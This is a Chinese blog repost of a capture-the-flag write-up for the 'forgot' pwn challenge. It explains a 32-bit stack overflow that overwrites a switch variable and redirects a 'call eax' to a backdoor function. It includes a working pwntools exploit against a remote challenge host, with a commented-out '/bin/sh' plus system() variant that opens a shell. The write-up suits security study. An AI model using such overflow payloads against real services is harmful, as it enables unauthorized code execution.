2. 程式人生 > 其它 >攻防世界-pwn-forgot

攻防世界-pwn-forgot

阿新 發佈:2021-01-15

技術標籤:CTF

簡單題…不過一開始沒找到重點,浪費時間了。
在這裡插入圖片描述
開始定義了一大堆沒有用的函式。
在這裡插入圖片描述
然後是開始一大堆輸出。給了函式地址,不過因為沒有PIE所以其實不需要…
漏洞點在scanf,明顯的溢位,但是這裡不是這麼做的…
在這裡插入圖片描述
下面是一個迴圈check,根據輸入最後決定v5的值 (重點)
在這裡插入圖片描述
結束迴圈後是一行奇怪的程式碼
在這裡插入圖片描述
其實看彙編更好理解
很明顯,如果我們控制了 [esp+78h] (這是棧上的我們能控制的值)
再在棧上合理位置佈置好值,就可以通過call eax執行任意函數了
事實上 [esp+78h] 就是上面switch中的 v5
如果我們一開始就把v5覆蓋成1-9之外的值,那整個迴圈中switch都不會執行

v5的值也就儲存下來了
有一個後門函式
在這裡插入圖片描述
將v5後的四個位元組作為函式地址,算得v5需覆蓋為21,符合要求
payload如下:

# -*- coding:utf-8 -*-
from pwn import *                                                      
#from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')
r = remote('220.249.52.134', 30894) 
e = ELF('/home/xyzmpv/桌面/d033ab68b3e64913a1b6b1029ef3dc29'
 
) 
#gdb.attach(r,'b* 0x08048A58')
#r  = process('/home/xyzmpv/桌面/d033ab68b3e64913a1b6b1029ef3dc29') 
#gdb.attach(r,'b* 0x08048A65')
system_addr = e.plt['system']
r.recvuntil('>')
r.sendline('a')
r.recvuntil('>')
r.sendline('a'*104+p32(21)+p32(0x80486cc))
#r.sendline('/bin/sh;'+'a'*96+p32(21)+p32(0xdeadbeef)+p32(system_addr))
 

r.interactive()

當然了,因為有system()所以get shell也可以
因為函式引數是 [esp] 正好是一個指向我們輸入的內容的指標
將padding頭部改為/bin/sh即可。

相關推薦

攻防世界-pwn-forgot

技術標籤:CTF 簡單題…不過一開始沒找到重點,浪費時間了。開始定義了一大堆沒有用的函式。然後是開始一大堆輸出。給了函式地址,不過因為沒有PIE所以其實不需要… 漏洞點在scanf,明顯的溢位,但是這裡不是這麼

攻防世界pwn題:forgot

0x00:檢視檔案資訊 該檔案是32位的,canary和PIE保護機制沒開。   0x01:用IDA進行靜態分析

攻防世界-pwn-writeup

when_did_you_born題目地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5051&page=1

攻防世界-pwn-int_overflow

此題是一道整數溢位型別的題,我們首先來看一下整數溢位的原理╰(°▽°)╯

[攻防世界 pwn]——get_shell

技術標籤:# 攻防世界 [攻防世界 pwn]——get_shell 題目地址: https://adworld.xctf.org.cn/題目:

[攻防世界 pwn]——level2

技術標籤:# 攻防世界 [攻防世界 pwn]——level2 題目地址: https://adworld.xctf.org.cn/題目:32位程式IDA中, 找到system和 ‘/bin/sh’ 地址進行覆蓋

pwn攻防世界 pwn新手區wp

pwn攻防世界 pwn新手區wp 前言 這幾天惡補pwn的各種知識點,然後看了看攻防世界pwn新手區沒有堆題(堆才剛剛開始看),所以就花了一晚上的時間把新手區的10題給寫完了。

攻防世界PWN簡單題 level0

攻防世界PWN簡單題 level0 開始考驗棧溢位的相關知識了 Checksec 一下檔案 看看都開了什麼保護 和 是多少位的程式

攻防世界PWN簡單題 level2

攻防世界PWN簡單題 level2 此題考驗的是對ROP鏈攻擊的基礎 萬事開頭PWN第一步checksec 一下

攻防世界forgot——讓人眼花目眩的一道題(詳細菜雞向)

技術標籤:教程反彙編pwn攻防世界forgot——讓人眼花目眩的一道題 今天做了一道攻防世界的進階題,看起來複雜的一匹,但是實際上也就這吧 (隨手關掉剛剛百度到的wp [doge]),做完後最直觀的感受就是自己的程式

攻防世界】:新手區 | when_did_you_born

checksec檢視程式型別: 有Canary,先看看程式邏輯 [*] \'/home/zowie/Downloads/when_did_you_born\'

攻防世界】:新手區 | guess number

checksec程式資訊: Arch:amd64-64-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:PIE enabled

攻防世界』:新手區 | int_overflow

checksec: Arch:i386-32-little RELRO:Partial RELRO Stack:No canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界』:新手區 | strings

checksec: Arch:amd64-64-little RELRO:Full RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x400000) IDA:

攻防世界』:新手區 | CGfsb

checksec: Arch:i386-32-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界 cr4-poor-rsa

題目 給了一個壓縮包,內有檔案:flag.b64(打開發現是base64編碼的)和key.pub 解題過程

攻防世界』:進階區 | stack2

checksec: Arch:i386-32-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界web進階(一)

1.PHP_python_template_injection 1.題目提示python模板注入,測試http://220.249.52.133:47149/{{7+7}},發現回顯“URL http://220.249.52.133:47149/14 not found”,說明括號裡的程式碼被執行了,存在SSTI。

攻防世界app2 frida獲取金鑰

環境準備 安裝mumu模擬器 pip安裝frida,這裡到最後一步setup需要很長時間。 在frida github下載對應服務端。

攻防世界』:進階區 | Mary_Morton

這道題讓我重新學了一遍格式化字串漏洞,自學真的太頂了。 checksec:開啟了canary